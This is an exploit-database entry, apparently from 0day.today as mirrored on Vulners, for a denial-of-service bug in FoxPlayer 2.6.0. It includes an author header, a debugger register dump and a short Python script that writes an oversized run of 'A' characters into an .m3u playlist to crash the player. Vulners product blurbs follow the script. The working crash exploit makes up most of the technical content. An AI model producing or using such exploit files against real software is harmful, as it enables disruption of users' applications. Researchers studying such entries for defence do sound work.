# ########################################
# Exploit Title : FoxPlayer 2.6.0 Denial of Service
# Software link : http://www.foxmediatools.com/products/foxplayer.html
# Version : 2.6.0
# Tested on : Windows XP SP3 English
# Date : 2/07/2011
# Author : X-h4ck
# Website : http://www.pirate.al , # PirateAL Crew @2011
# Email : [email protected]
# Greetz : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta
#
# ++++++++++++++++++++++++++++++++++++++++
# EAX 00000001
# ECX 80604824
# EDX F98D29A0
# EBX 009E3F24
# ESP 00D7FF24
# EBP 00D7FF58
# ESI 00D7FF80
# EDI 00150178
# EIP 7C90E440 ntdll.KiUserCallbackDispatcher
# C 0 ES 0023 32bit 0(FFFFFFFF)
# P 1 CS 001B 32bit 0(FFFFFFFF)
# A 0 SS 0023 32bit 0(FFFFFFFF)
# Z 1 DS 0023 32bit 0(FFFFFFFF)
# S 0 FS 003B 32bit 7FFDC000(FFF)
# T 0 GS 0000 NULL
# D 0
# O 0 LastErr ERROR_SUCCESS (00000000)
# EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
# ST0 empty -4.0939429568750045000e-304
# ST1 empty 4.3561165078637922000e+184
# ST2 empty 4.1992150799306400000e-314
# ST3 empty -4.1012839767180717000e-304
# ST4 empty 3.8485487393211591000e+032
# ST5 empty -4.1034116763009024000e-304
# ST6 empty 1.1842037541513188000e-103
# ST7 empty 1.2519775166695107000e-312
# 3 2 1 0 E S P U O Z D I
# FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
# FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
# ++++++++++++++++++++++++++++++++++++++++
#!/usr/bin/python
try:
junk = "\x41" * 100000
f = open("crash.m3u",'w')
f.write(junk)
f.close()
print "File created succesfuly\n"
except:
print "ERROR!\n"
# 0day.today [2018-01-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation